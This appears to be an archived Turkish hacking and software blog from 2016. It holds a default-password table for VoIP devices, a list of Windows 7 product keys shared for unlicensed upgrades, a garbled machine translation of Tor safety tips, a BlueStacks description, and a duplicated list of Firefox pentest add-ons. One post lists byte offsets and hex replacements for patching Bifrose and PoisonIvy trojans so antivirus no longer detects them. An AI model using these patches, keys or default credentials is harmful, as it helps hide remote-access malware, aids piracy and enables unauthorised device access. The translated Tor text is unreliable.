| Vendor | VoIP Device | Username | Password |
| Acme | Packet 4600 | admin | packet |
| Alcatel | 4400 PBX | kermit | kermit |
| Asterisk | AsteriskNow | Admin | admin |
| Avaya | IP Office 500 | Administrator | Administrator |
| Avaya | Aura Conferencing | admin | admin |
| Cisco | CallManager | admin | admin |
| Cisco | SPA122 | admin | admin |
| Cisco | Unified Communications 500 | cisco | cisco |
| Cisco | IP Conference Station 7936 | administrator | **# |
| Grandstream | UCM6102 | admin | admin |
| Mitel | 3300 PBX | system | password |
| Mitel | SX-200 | installer | 1000 |
| Mitel | SX-2000 | system | password |
| Mitel | Aastra 6737i/6739i | admin | 22222 |
| Polycom | DMA 7000 | admin | admin |
| Polycom | Soundstation IP6000 | Polycom | 456 |
| Polycom | Soundstation IP5000 | admin | 456 |
| Sonus | SBC Platform Manager | admin | Sonus12345 |
| Snom | Snom One | admin | |
| Yealink | All Phones | admin | admin |
21 Ekim 2016 Cuma
VoIP Default Password List
11 Ekim 2016 Salı
Windows 7 Yükseltme Orjinal Yazılım
Orjinaldir yazılım sahte değildir.
Windows Anytime Upgrade ile yükseltebilirsiniz.Bütün bilgileriniz saklanır yaklaşık 10 dakika sürer.
Ultimate'e yükseltmek için ürün anahtarları:
Bu her markada olur: 22TKD-F8XX6-YG69F-9M66D-PMJBM (Ultimate)
Bu her markada olur: 4FG99-BC3HD-73CQT-WMF7J-3Q6C9 (Home Premium)
Bu her markada olur: GMJQF-JC7VC-76HMH-M4RKY-V4HX6 (Professional)
FJGCP-4DFJD-GJY49-VJBQ7-HYRR2
VQ3PY-VRX6D-CBG4J-8C6R2-TCVBD
4HMYB-6YHYT-TW2J6-FQBC3-6GBFW
2Y4WT-DHTBF-Q6MMK-KYK6X-VKM6G
342DG-6YJR8-X92GV-V7DCV-P4K27
9CW99-79BBF-D4M3X-9BK9M-4RPH9
MHFPT-8C8M2-V9488-FGM44-2C9T3
6K2KY-BFH24-PJW6W-9GK29-TMPWP
76MTG-QMQJQ-46DQR-CHRBB-7K3HD
49PB6-6BJ6Y-KHGCQ-7DDY6-TF7CD
YJJYR-666KV-8T4YH-KM9TB-4PY2W
4BRY2-6W9VH-9CM6R-GPKRY-HHVCY
2WX6M-X2HKM-86X8X-2QD44-F3FGJ
78FPJ-C8Q77-QV7B8-9MH3V-XXBTK
9D4JH-GPGMP-CTQYB-XM74F-2CTYY
Başlat menüsünden "anytime upgrade" diye aratıp Windows Anytime Upgrade'e girip bu anahtarlardan herhangi birini yazıp 10 dk. içinde yükseltme işlemini gerçekleştirebilirsiniz.
Windows 7 Ultimate Acer FJGCP-4DFJD-GJY49-VJBQ7-HYRR2
Windows 7 Ultimate Alienware VQ3PY-VRX6D-CBG4J-8C6R2-TCVBD
Windows 7 Ultimate Asus 2Y4WT-DHTBF-Q6MMK-KYK6X-VKM6G
Windows 7 Ultimate Dell 342DG-6YJR8-X92GV-V7DCV-P4K27
Windows 7 Ultimate HP MHFPT-8C8M2-V9488-FGM44-2C9T3
Windows 7 Ultimate Lenovo (new) 6K2KY-BFH24-PJW6W-9GK29-TMPWP
Windows 7 Ultimate Lenovo (old) 22TKD-F8XX6-YG69F-9M66D-PMJBM
Windows 7 Ultimate Samsung 49PB6-6BJ6Y-KHGCQ-7DDY6-TF7CD
Windows 7 Professional Acer YKHFT-KW986-GK4PY-FDWYH-7TP9F
Windows 7 Professional Asus 2WCJK-R8B4Y-CWRF2-TRJKB-PV9HW
Windows 7 Professional Dell 32KD2-K9CTF-M3DJT-4J3WC-733WD
Windows 7 Professional Fujitsu PT9YK-BC2J9-WWYF9-R9DCR-QB9CK
Windows 7 Professional HP 74T2M-DKDBC-788W3-H689G-6P6GT
Windows 7 Professional Lenovo 237XB-GDJ7B-MV8MH-98QJM-24367
Windows 7 Professional Samsung GMJQF-JC7VC-76HMH-M4RKY-V4HX6
Windows 7 Professional Sony H9M26-6BXJP-XXFCY-7BR4V-24X8J
Windows 7 Professional Toshiba 2V8P2-QKJWM-4THM3-74PDB-4P2KH
Windows 7 Professional Unknown 862R9-99CD6-DD6WM-GHDG2-Y8M37
Windows 7 Home Premium Acer VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7
Windows 7 Home Premium Advent 38JTJ-VBPFW-XFQDR-PJ794-8447M
Windows 7 Home Premium Asus 2QDBX-9T8HR-2QWT6-HCQXJ-9YQTR
Windows 7 Home Premium Asus (Eee) 7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG
Windows 7 Home Premium Dell 6RBBT-F8VPQ-QCPVQ-KHRB8-RMV82
Windows 7 Home Premium Fujitsu C6MHH-TRRPT-74TDC-FHRMV-XB88W
Windows 7 Home Premium HP 4FG99-BC3HD-73CQT-WMF7J-3Q6C9
Windows 7 Home Premium Lenovo 27GBM-Y4QQC-JKHXW-D9W83-FJQKD
Windows 7 Home Premium LG 38GRR-KMG3D-BTP99-TC9G4-BBDJJ
Windows 7 Home Premium Medion 2P2P9-CM3F8-FTV6P-PC7CX-8TFF7
Windows 7 Home Premium MSI 4G3GR-J6JDJ-D96PV-T9B9D-M8X2Q
Windows 7 Home Premium Samsung CQBVJ-9J697-PWB9R-4K7W4-2BT4J
Windows 7 Home Premium Siragon HWDFB-YVFG4-3TJ7F-Q3WMT-7B6PH
Windows 7 Home Premium Sony H4JWX-WHKWT-VGV87-C7XPK-CGKHQ
Windows 7 Home Premium Toshiba 6B88K-KCCWY-4F8HK-M4P73-W8DQG
Windows 7 Home Premium Toshiba 6GF36-P4HWR-BFF84-6GFC2-BWX77
Windows 7 Home Premium Unknown 2XPWB-Q64BJ-W8CT3-WJTWT-4DQ99
Windows 7 Home Basic Acer MB4HF-2Q8V3-W88WR-K7287-2H4CP
Windows 7 Home Basic Asus 89G97-VYHYT-Y6G8H-PJXV6-77GQM
Windows 7 Home Basic Dell 36T88-RT7C6-R38TQ-RV8M9-WWTCY
Windows 7 Home Basic HP DX8R9-BVCGB-PPKRR-8J7T4-TJHTH
Windows 7 Home Basic Lenovo 22MFQ-HDH7V-RBV79-QMVK9-PTMXQ
Windows 7 Home Basic Samsung 2P6PB-G7YVY-W46VJ-BXJ36-PGGTG
Windows 7 Home Basic TONGFANG 9DBMT-GXRWM-6Q9Y3-WMYM8-FJCBW
Windows 7 Starter Acer RDJXR-3M32B-FJT32-QMPGB-GCFF6
Windows 7 Starter Asus (Eee) 6K6WB-X73TD-KG794-FJYHG-YCJVG
Windows 7 Starter Dell 36Q3Y-BBT84-MGJ3H-FT7VD-FG72J
Windows 7 Starter HP RH98C-M9PW4-6DHR7-X99PJ-3FGDB
Windows 7 Starter Lenovo (1) 273P4-GQ8V6-97YYM-9YTHF-DC2VP
Windows 7 Starter Lenovo (2) 22P26-HD8YH-RD96C-28R8J-DCT28
Windows 7 Starter Nokia 2XGHP-9TQK2-8CF28-BM2P2-8FRX8
Windows 7 Starter Samsung PV9BD-YBRX6-CTMG6-CCMJY-X8XG7
Windows 7 Starter Sony 32J2V-TGQCY-9QJXP-Q3FVT-X8BQ7
Windows 7 Starter Toshiba TGBKB-9KBGJ-3Y3J6-K8M2F-J2HJQ
BİR TEŞEKKÜRÜ Çok görmeyin :)))
6 Ekim 2016 Perşembe
Tor gerçekten işe ister?
Tor gerçekten işe ister?
Bazı şeyler için kullanılır tam olarak çalışmaz gibi, Bazı alışkanlıklarınızı değiştirmeniz gerekir.
Tor Tarayıcı kullanın
Bunu çalıştırdığınızda Tor bilgisayarınızın Internet trafiğinin tüm koruma sağlamaz. Tor sadece düzgün Tor üzerinden Internet trafiğini göndermek üzere yapılandırılmış uygulamaları korur. Tor yapılandırması sorunlarını önlemek için, şiddetle kullanmanızı tavsiye ederiz Tor Tarayıcı . Önceden yapılandırılmış size Tor Tarayıcı kendisi ile tarama konum sürece web üzerinde gizlilik ve gizliliği korumak için. Hemen hemen tüm diğer web tarayıcısı yapılandırması Tor ile kullanmak güvensiz olması muhtemeldir.
Tor üzerinden torrent etmeyin
Torrent dosya paylaşım uygulamaları proxy ayarlarını göz ardı ve onlar Tor kullanmak için söylendi zaman bile doğrudan bağlantı yapmak için gözlenmiştir. Torrent uygulama sadece Tor üzerinden bağlanır bile o sel nasıl çalıştığını, çünkü sık sık, izci GET isteği gerçek IP adresini gönderir. Sadece siz değil mi torrent trafik ve diğer eş zamanlı Tor web trafiği deanonymize ayrıca, bu şekilde herkes için tüm Tor ağını yavaşlatabilir.
tarayıcı eklentileri etkinleştirmek veya takmayın
Tor Tarayıcı Flash, RealPlayer, Quicktime, ve diğerleri gibi tarayıcı eklentileri engeller: Onlar IP adresinizi ifşa manipüle edilebilir. Bu Tor atlamak ya da başka anonimliğinizi ve gizlilik zarar verebilir Benzer şekilde, biz, Tor Tarayıcı içine ilave addons veya eklentileri yükleyerek önermiyoruz.
web sitelerinin HTTPS sürümlerini kullanan
Tor trafik şifreler ve tor ağı içinde , ancak nihai hedef web sitesine trafik şifreleme o web sitesinde bağlıdır. Web sitelerine özel şifreleme sağlamak için, Tor Tarayıcı içeren her HTTPS onu destekleyen önemli web siteleri ile HTTPS şifreleme kullanımını zorlamak için. Ancak, yine de bir görüntülemek için hassas bilgi sağlamak web siteleri sağlamak için tarayıcı URL çubuğunu izlemek gerekir mavi veya yeşil URL çubuğuna düğme içerir https: // URL içinde ve web sitesi için uygun beklenen adını görüntülemek. Ayrıca açıklayan EFF interaktif sayfaya bakınız Tor ve HTTPS ilişki nasıl .
değil açık belgeler online iken Tor üzerinden indirilen Do
Tor Browser otomatik olarak harici uygulamalarla işlenir belgeleri açmadan önce sizi uyarır. Bu uyarıyı göz ardı ETMEYİN . Tor aracılığıyla belgeleri indirirken bu belgelerin onları açar uygulama tarafından Tor dışında yüklenir Internet kaynaklarına içerebilir (özellikle DOC ve PDF dosyaları size Tor Tarayıcı içine yerleşik PDF görüntüleyici kullanmadığınız sürece,) çok dikkatli olmalıdır. Bu olmayan Tor IP adresini ortaya çıkaracaktır. Eğer DOC ve / veya PDF dosyaları ile çalışmak gerekiyorsa, biz şiddetle tavsiye ya serbest indirmek, bir kesilmiş bilgisayarı kullanarak VirtualBox ve onu kullanarak sanal makine görüntü engelli ağ, ya da kullanarak Tails . Hiçbir koşulda güvenli kullanmak için BitTorrent ve Tor , ancak birlikte.
köprüleri kullanın ve / veya şirket bulmak
Tor bağlanmak Ne hedef web siteleri öğrenme saldırganların önlemek için çalışır. Ancak, varsayılan olarak, bu Tor kullandığınız öğrenmeden Internet trafiğini izlerken birilerine engel değildir. Bu sizin için önemli ise, bir kullanmak için Tor yapılandırarak bu riski azaltabilir Tor köprü röle kamu Tor ağına doğrudan bağlanarak yerine. Sonuçta en iyi koruma sosyal bir yaklaşımdır: Orada daha Tor, kullanıcıların size daha yakın çeşitli çıkarları, o olacak daha az tehlikeli Eğer onlardan biri olduğunu. Çok Tor kullanmak için başka insanları ikna!
Akıllı olun ve daha fazlasını öğrenin. Tor yapar ve sunmuyor anlıyorum. Tuzakların Bu liste tam değildir ve biz yardım ihtiyacımız Bütün sorunların tanımlanması ve belgelenmesi .
8 Eylül 2016 Perşembe
BlueStacks 2.5.41.6576 (Windows)
BlueStacks, Windows işletim sistemine sahip bilgisayarları üzerinde Android oyunlarını oynamak veya Android uygulamalarını çalıştırmak isteyen kullanıcılar için geliştirilmiş olan oldukça gelişmiş bir Android simülatörüdür.
Piyasada yer alan en akıcı ve en etkili Android simülatörlerinden olan BlueStacks'ın kurulumu da oldukça kolaydır ve her seviyeden bilgisayar kullanıcısı BlueStacks kurulum işlemini kolayca tamamlayabilir. Kurulum sırasında BlueStacks gerekli dosyaları bilgisayarınıza yüklerken uzun bir süre ekran kilitlenmiş gibi görünebilir ama bu sırada kurulum işlemi devam etmektedir. Kurulum işlemi uzun bir süreç gerektirdiği için sabırla bekleyerek BlueStacks'ın bilgisayarınıza kurulumunun tamamlanmasını bekleyiniz.
Kurulum işleminin ardından otomatik olarak çalışmaya başlayacak olan BlueStacks, klasik Android arayüzünü bilgisayarınız üzerine taşıyacak ve eğer daha önce Android işletim sistemine sahip bir cihaz kullandıysanız, hiç zorlanmadan BlueStacks'ı kullanmaya başlayabileceksiniz.
Bilgisayarınız üzerinde kullanmak istediğiniz Android uygulamaları ve oynamak istediğiniz Android oyunları için öncelikle Google Play Store üzerine sahip olduğunuz Gmail hesabı yardımıyla giriş yapmanız gerekmektedir. Google hesabınızla BlueStacks üzerinde oturum açtıktan sonra istediğiniz tüm oyunları ve uygulamaları indirerek hemen kullanmaya başlayabilirsiniz.
Android oyunlarını bilgisayarda oynamak ve Android uygulamalarını bilgisayarda çalıştırmak hiç bu kadar kolay olmamıştı. Eğer sizler de Android işletim sistemini bilgisayarlarınız üzerine taşımak ve bilgisayarınızda Android kullanmak istiyorsanız BlueStacks'ı mutlaka denemelisiniz.
Not: Bazı sistemlerde BlueStacks yazılımını kullanabilmek için Microsoft .NET Frameworkpaketinin de bilgisayarınızda kurulu olması gerekmektedir.
BlueStacks 2 ile gelen yenilikler:
- Sekme sistemi sayesinde aynı anda birden fazla Android uygulaması çalıştırma. Bunun anlamı bir sekmede oyun oynarken diğer sekmede mesajlaşma uygulamasını çalıştırıp ikisini aynı anda yapabilirsiniz.
- Yeni Android uygulaması ve oyunu keşfetme geliştirildi.
- Oyun oynama deneyimleri geliştirildi.
- Sadeleştirilmiş arayüz
- Fotoğraf transfer etme
- Ekran görüntüsü alma
Download http://www.bluestacks.com/download.html?utm_campaign=homepage-dl-button
18 Temmuz 2016 Pazartesi
Facebook Hesabını Kalıcı Olarak Silme
 |
| Facebook Hesabını Kalıcı Olarak Silme |
20 Mart 2016 Pazar
13 Mart 2016 Pazar
9 Mart 2016 Çarşamba
Trojenlerin Offset,Hex Numaraları
Kod:
Win32:Bifrose-EKO[Trj]
offset : 1960
63
43
======================
Win32:Trojan.Gen
offset : 13186
55
75
======================
Win32:Malware.Gen
offset : 27690
E1
E2
Kod:
win32:Bifrose-DYN[Trj]
offset : 2239
68
67
======================
win32:crypt-GKN [Drp]
offset : 5360
27
26
======================
win32:Bifrose-DRT[Trj]
offset : 8071
8A
7A
======================
win32:Bifrose-ENM[Trj]
offset : 13856
9E
8E
======================
win32:Crypt-CIK[Trj]
offset : 20323
85
84
=======================
Win32:Midgare-JN[Trj]
offset : 24745
08
18
=======================
Win32:Inject-UH[Trj]
offset : 27624
85
86
=======================
Win32:Bofrose-ENN[Trj]
offset : 28517
c8
c7
=======================
Win32:Midgare-UT[Trj]
offset : 28970
c0
c1
=======================
win32:Malware-gen
28961
28962
Kod:
Trojan horse BackDoor.Bifrose.DF
offset : 175
8F
9F
================================
Trojan horse lnjector.JR
offset : 1220
74
54
================================
Kod:
BDS/Bifrose.32637
offset :24048
b8
08
==================
BSD/Bifrose.ZXE
Offset :21896
C9
C6
==================
BSD/Bifrose.agib
Offset: 18681
41
61
==================
DR/bvb.SAG
Offset :11942
C0
C1
==================
TR/Crypt.XDR.Gen
Offset :1324
B2
B4
==================
BDS/Bifrose.Gen
offset :29789
00
10
=================
TR/Crypt.ZPACK.Gen
Offset :382
00
10
=================
TR/Crypt.XPACK.Gen
462
00
10
==================
Kod:
win32:Tiny-ADY[Trj]
offset :1067
F1
F2
==================
Win32:Agent-ACII[Trj]
offset : 1129
04
24
===================
Win32:Agent-AAGI[Trj]
offset :1057 + 1058
w>W
s>S
====================
Win32: Poison-IJ[Trj]
offset :1294
j
J
====================
Win32: Poison-DE [Trj]
offset :1483
c
C
=====================
Win32: Poisonivy-HW[Trj]
offset :1963
33
32
=====================
Win32: Poison-CJ [Trj]
offset :2004
5A
7A
====================
Win32: PoisonIvy-HX [Trj]
offset :2017
68
48
====================
Win32: Poison-CJx [Trj]
offset :2784
32
33
=====================
Win32: Poison-FU [Trj]
offset :3368
7E
7F
=====================
win32: poisonivy-hv[Trj]
offset : 4410 88
offset : 4411 9E
offset : 4412 D6
offset : 4413 07
offset : 4407 07
offset : 4485 07
=======================
win32: poison-FE[Trj]
offset : 5805
01
02
=======================
win32: poisonivy-EG[Trj]
offset : 5812
C1
C0
========================
win32: poison-FD[Trj]
offset : 5908
2E
3E
========================
Win32: Agent- TZE [Trj]
offset : 6447
04
24
========================
win32: poisonivy-HN[Trj]
offset : 7462
04
24
=======================
Kod:
Trojan horse BackDoor.PoisonIvy.AD
offset : 146
B6
B5
===================================
Trojan horse BackDoor.PoisonIvy.BH
offset : 164
F9
F8
===================================
14 Şubat 2016 Pazar
Firefox Pentester Plugins Tools
1. Tamper Data
HTTP/HTTPS header ve post parametrelerini değiştirmek ve görüntülemek için kullanılan bir araçtır. Bununla birlikte en çok kullanılan popüler bir eklentidir. Bu eklenti ile hedefe üzerindeki post ve get istekleri üzerinde değişiklik yapmayı sağlar. Bu şekilde güvenlik testlerinde yapılacak XSS ve SQLi saldırılarında da yardımcı olur.
https://addons.mozilla.org/en-us/firefox/addon/tamper-data/
2. Fire Bug
Web geliştiricilerinin en büyük yardımcılarından biri olan bu araç, anlık olarak browser üzerinde HTML, CSS ve JS inceleyebilir ve hata ayıklamalarını yapabilir. Aynı zamanda web uygulama güvenliği içinde etkili bir eklentidir. Bu eklenti ile JS dosyaları incelenerek XSS açıkları kontrol edilebilir. Elde edilen verilere göre DOM Based XSS gibi ataklar gerçekleştirilebilir.
https://addons.mozilla.org/en-US/firefox/addon/firebug/
3. Hackbar
Hackbar Firefox için hazırlanmış basit bir pentest aracıdır. SQLi ve XSS testlerinde yardımcı olur. Direk olarak saldırıda bulunmaz ama hedef üzerinde zafiyet olup olmadığını anlamaya yardımcı olur. Bu araç ile hedefe elle POST veri gönderip ataklarda bulunulabilir. Bunun dışında şifreleme ve encode işlemi yapar. Kullanımı basit olan bu araç siteyi ilk analiz aşamasında hızlı bir şekilde kontrol etmek için kullanılabilecek en iyi araçlardan biridir.
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
4. Cookie Manager+
Firefox Eklentiler arasındaki en büyük araçlardan biride Cookie Manager+ dır. Adından da belli olduğu gibi cookie yönetim aracıdır. Bu araç ile cookieleri görüntüleyebilir, düzenleyebilir ve yeni cookieler oluşturabilirsiniz. Cookieler hakkında detaylı bilgi verebilir ve aynı andan birden çok cookie yedekleme ve geri yükleme eylemini gerçekleştirir.
https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
5. NoScript
NoScript çok büyük ve popüler bir eklentidir. Bu araç ile web sitesi üzerindeki çalışan scriptler görüntülenebilir ve bloklanabilir. Bunun dışında site üzerinde neler yaptığı da kontrol edilebilir. Genel olarak uzmanlar tarafından kullanılır. Bu eklentiyi güvenlik testi yaparken kapatılması gerekebilir çünkü bu araç SQLi ve Xss saldırılarını engelleyebilir ve sizin doğru sonuçlara gitmenizi engelleyebilir.
https://addons.mozilla.org/en-us/firefox/addon/noscript/
6. GreaseMonkey
NoScript ile ters mantık çalışan bir eklentidir. Script bloklamak için NoScript kullanırken, çalıştırmak için ise GreaseMonkey kullanılır. Tam olarak bir web sitesini istediği gibi kullanmaya yarar. Tek başına bir işe yaramaz, kendi yazdığınız scriptkler ve ya paylaşılan scriptler ile kullanabilirsiniz. Örnek olarak bir site üzerinde video indirme, google sayfalarında renk değiştirme vb...
https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/
7. User Agent Switcher
User Agent Switcher eklentisi birçok amaç için kullanılabilir. Örnek; bir web sitesine girildiğinde arka tarafta hangi tarayıcı ile gelindiği gösterilir. Bu uygulama ile bu değiştirilerek, sayfaya başka bir tarayıcı ve ya mobil bir tarayıcı ile geliyor gibi gösterilebilir. Bu araç ile hedef sisteme atak yapılacağı zaman, karşı tarafa tarayıcı bilgisi saklanabilir.
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/
8. CryptoFox
CryptoFox, Firefox için geliştirilmiş şifreleme ve şifre çözme aracıdır. Birçok şifreleme algoritmasını desteklemektedir. Bu sayede desteklenen şifre algoritmalarını kolayca çözülebilir. Aynı zamanda md5 şifrelerini kırmak ve sözlük saldırılarını da desteklemektedir.
https://addons.mozilla.org/en-US/firefox/addon/cryptofox/
9. SQL Inject Me
Firefox için en güzel eklentilerden biridir, bir web uygulama üzerinde SQLi bulmak için kullanılır. Ama sadece zafiyet olduğunu gösterir, bu zafiyeti exploit etmez. SQLi açıkları çok eski olmasına rağmen hala varlığını sürdüren tehlikeli bir açıktır ve birçok sistemde mevcuttur. Bu yüzden hedef üzerine bu tür ataklar yapılacağı zaman bu araç adımları daha da hızlandırmaya yardımcı olur.
https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/
10. XSS Me
Diğer önemli açıklardan biriside XSS (Cross Site Scripting) açığıdır. SQLi gibi bir çok web uygulama üzerinde mevcuttur. Bu araç ile ise hem açığı bulur hem de saldırı yapmaya olanak sağlar. Saldırı ise sizin daha önceden belirlemiş olduğunu XSS payloadlar ile olur. Web uygulama testlerinde XSS açığı aramak için pratik araçlardan biridir.
https://addons.mozilla.org/en-us/firefox/addon/xss-me/
11. Passive Recon
Web sayfaları üzerinde herhangi bir iz bırakmadan bilgi toplayan bir araçtır. Pasif bilgi toplama aracıdır. Backtrack üzerinde aynı işi yapan birçok araçta mevcuttur. Ama hızlılık ve anlık kontrol açısından kullanım kolaylığı sağlamaktadır.
https://addons.mozilla.org/en-US/firefox/addon/passiverecon/
12. Host Spy
Herhangi bir Ipnin komşularını görüntülemeyi sağlayan Firefox araçlarından biridir. Aynı ip üzerindeki diğer siteleri görebilirsiniz.
https://addons.mozilla.org/en-us/firefox/addon/host-spy/
13. Firesheep
Firesheep aracı Firefox üzerindeki en etkili araçlardan biridir. Aynı ağ üzerindeki cookieleri yakalan bir araçtır. Tek başına değil Winpcap kütüphanesi ile beraber kullanılır. Yakaladığı cookieler ile facebook, twitter, youtube vs gibi birçok hesap ele geçirilebilir. Bu yüzden bağladığımız Wireless ağlarına dikkat etmek gerekir. Bu aracın bir benzeri de Facesniff aracıdır, bu araç ise Android içindir.
http://codebutler.com/firesheep/
14. Proxy Bar
Proxy değiştirme aracıdır. Proxy sürekli değiştirerek konumunuzun bulunmamasını sağlar. Bu tür araçları yasaklı sitelere girmek içinde kullananlar vardır. Bu aracın dışında diğer popüler araç ise FoxyProxy dir.
https://addons.mozilla.org/en-us/firefox/addon/proxybar/
15. WOT (Web of Trust)
Bu araç ise son kullanıcı ağırlıklı bir araçtır. Bu araç tehlike içeren ve güvenilir olan siteleri gösterir. Aynı zamanda link koruması da mevcuttur bu şekilde gelen maillerin barındırdığı linkleri sizin için kontrol eder. Bu şekilde güvenli bir şekilde İnternet üzerinde dolaşmanızı sağlar. Bu aracın benzerleri de mevcuttur. Ama birinin ak dediğine diğeri kara diyebiliyor bu yüzden dikkatli olmak gerek.
https://addons.mozilla.org/en-US/firefox/addon/wot-safe-browsing-tool/
16. Exploit Search
Burada ise en çok kullanılan exploit arama araçları yer alıyor. Hepsini tek başlık altında yazmak istedim.
Packet Storm https://addons.mozilla.org/en-us/firefox/addon/packet-storm-search-plugin/
Exploit.db https://addons.mozilla.org/en-us/firefox/addon/offsec-exploit-db-search/
Security Focus https://addons.mozilla.org/en-us/firefox/addon/securityfocus-vulnerabilities-/
OSVDB https://addons.mozilla.org/en-us/firefox/addon/osvdb/
17. Wappalyzer
Bu araç ile sitelerin kullandığı uygulama ve yazılımları belirlemekte yardımcı olur. Bunlar öğrenilerek yukarıdaki araçlar ile ne tür zafiyetler olduğu araştırılabilir.
https://addons.mozilla.org/en-us/firefox/addon/wappalyzer/
18. Server Spy
Bu araç ise adından da belli olduğu gibi sunucu bilgisi gösterir. (Apache, ISS ) Web sunucu bilgileri de bizim için önemlidir. Çünkü hedef üzerinde sunucu zafiyetlerine göre çeşitli ataklar düzenleyebiliriz.
https://addons.mozilla.org/en-US/firefox/addon/server-spy/
HTTP/HTTPS header ve post parametrelerini değiştirmek ve görüntülemek için kullanılan bir araçtır. Bununla birlikte en çok kullanılan popüler bir eklentidir. Bu eklenti ile hedefe üzerindeki post ve get istekleri üzerinde değişiklik yapmayı sağlar. Bu şekilde güvenlik testlerinde yapılacak XSS ve SQLi saldırılarında da yardımcı olur.
https://addons.mozilla.org/en-us/firefox/addon/tamper-data/
2. Fire Bug
Web geliştiricilerinin en büyük yardımcılarından biri olan bu araç, anlık olarak browser üzerinde HTML, CSS ve JS inceleyebilir ve hata ayıklamalarını yapabilir. Aynı zamanda web uygulama güvenliği içinde etkili bir eklentidir. Bu eklenti ile JS dosyaları incelenerek XSS açıkları kontrol edilebilir. Elde edilen verilere göre DOM Based XSS gibi ataklar gerçekleştirilebilir.
https://addons.mozilla.org/en-US/firefox/addon/firebug/
3. Hackbar
Hackbar Firefox için hazırlanmış basit bir pentest aracıdır. SQLi ve XSS testlerinde yardımcı olur. Direk olarak saldırıda bulunmaz ama hedef üzerinde zafiyet olup olmadığını anlamaya yardımcı olur. Bu araç ile hedefe elle POST veri gönderip ataklarda bulunulabilir. Bunun dışında şifreleme ve encode işlemi yapar. Kullanımı basit olan bu araç siteyi ilk analiz aşamasında hızlı bir şekilde kontrol etmek için kullanılabilecek en iyi araçlardan biridir.
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
4. Cookie Manager+
Firefox Eklentiler arasındaki en büyük araçlardan biride Cookie Manager+ dır. Adından da belli olduğu gibi cookie yönetim aracıdır. Bu araç ile cookieleri görüntüleyebilir, düzenleyebilir ve yeni cookieler oluşturabilirsiniz. Cookieler hakkında detaylı bilgi verebilir ve aynı andan birden çok cookie yedekleme ve geri yükleme eylemini gerçekleştirir.
https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
5. NoScript
NoScript çok büyük ve popüler bir eklentidir. Bu araç ile web sitesi üzerindeki çalışan scriptler görüntülenebilir ve bloklanabilir. Bunun dışında site üzerinde neler yaptığı da kontrol edilebilir. Genel olarak uzmanlar tarafından kullanılır. Bu eklentiyi güvenlik testi yaparken kapatılması gerekebilir çünkü bu araç SQLi ve Xss saldırılarını engelleyebilir ve sizin doğru sonuçlara gitmenizi engelleyebilir.
https://addons.mozilla.org/en-us/firefox/addon/noscript/
6. GreaseMonkey
NoScript ile ters mantık çalışan bir eklentidir. Script bloklamak için NoScript kullanırken, çalıştırmak için ise GreaseMonkey kullanılır. Tam olarak bir web sitesini istediği gibi kullanmaya yarar. Tek başına bir işe yaramaz, kendi yazdığınız scriptkler ve ya paylaşılan scriptler ile kullanabilirsiniz. Örnek olarak bir site üzerinde video indirme, google sayfalarında renk değiştirme vb...
https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/
7. User Agent Switcher
User Agent Switcher eklentisi birçok amaç için kullanılabilir. Örnek; bir web sitesine girildiğinde arka tarafta hangi tarayıcı ile gelindiği gösterilir. Bu uygulama ile bu değiştirilerek, sayfaya başka bir tarayıcı ve ya mobil bir tarayıcı ile geliyor gibi gösterilebilir. Bu araç ile hedef sisteme atak yapılacağı zaman, karşı tarafa tarayıcı bilgisi saklanabilir.
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/
8. CryptoFox
CryptoFox, Firefox için geliştirilmiş şifreleme ve şifre çözme aracıdır. Birçok şifreleme algoritmasını desteklemektedir. Bu sayede desteklenen şifre algoritmalarını kolayca çözülebilir. Aynı zamanda md5 şifrelerini kırmak ve sözlük saldırılarını da desteklemektedir.
https://addons.mozilla.org/en-US/firefox/addon/cryptofox/
9. SQL Inject Me
Firefox için en güzel eklentilerden biridir, bir web uygulama üzerinde SQLi bulmak için kullanılır. Ama sadece zafiyet olduğunu gösterir, bu zafiyeti exploit etmez. SQLi açıkları çok eski olmasına rağmen hala varlığını sürdüren tehlikeli bir açıktır ve birçok sistemde mevcuttur. Bu yüzden hedef üzerine bu tür ataklar yapılacağı zaman bu araç adımları daha da hızlandırmaya yardımcı olur.
https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/
10. XSS Me
Diğer önemli açıklardan biriside XSS (Cross Site Scripting) açığıdır. SQLi gibi bir çok web uygulama üzerinde mevcuttur. Bu araç ile ise hem açığı bulur hem de saldırı yapmaya olanak sağlar. Saldırı ise sizin daha önceden belirlemiş olduğunu XSS payloadlar ile olur. Web uygulama testlerinde XSS açığı aramak için pratik araçlardan biridir.
https://addons.mozilla.org/en-us/firefox/addon/xss-me/
11. Passive Recon
Web sayfaları üzerinde herhangi bir iz bırakmadan bilgi toplayan bir araçtır. Pasif bilgi toplama aracıdır. Backtrack üzerinde aynı işi yapan birçok araçta mevcuttur. Ama hızlılık ve anlık kontrol açısından kullanım kolaylığı sağlamaktadır.
https://addons.mozilla.org/en-US/firefox/addon/passiverecon/
12. Host Spy
Herhangi bir Ipnin komşularını görüntülemeyi sağlayan Firefox araçlarından biridir. Aynı ip üzerindeki diğer siteleri görebilirsiniz.
https://addons.mozilla.org/en-us/firefox/addon/host-spy/
13. Firesheep
Firesheep aracı Firefox üzerindeki en etkili araçlardan biridir. Aynı ağ üzerindeki cookieleri yakalan bir araçtır. Tek başına değil Winpcap kütüphanesi ile beraber kullanılır. Yakaladığı cookieler ile facebook, twitter, youtube vs gibi birçok hesap ele geçirilebilir. Bu yüzden bağladığımız Wireless ağlarına dikkat etmek gerekir. Bu aracın bir benzeri de Facesniff aracıdır, bu araç ise Android içindir.
http://codebutler.com/firesheep/
14. Proxy Bar
Proxy değiştirme aracıdır. Proxy sürekli değiştirerek konumunuzun bulunmamasını sağlar. Bu tür araçları yasaklı sitelere girmek içinde kullananlar vardır. Bu aracın dışında diğer popüler araç ise FoxyProxy dir.
https://addons.mozilla.org/en-us/firefox/addon/proxybar/
15. WOT (Web of Trust)
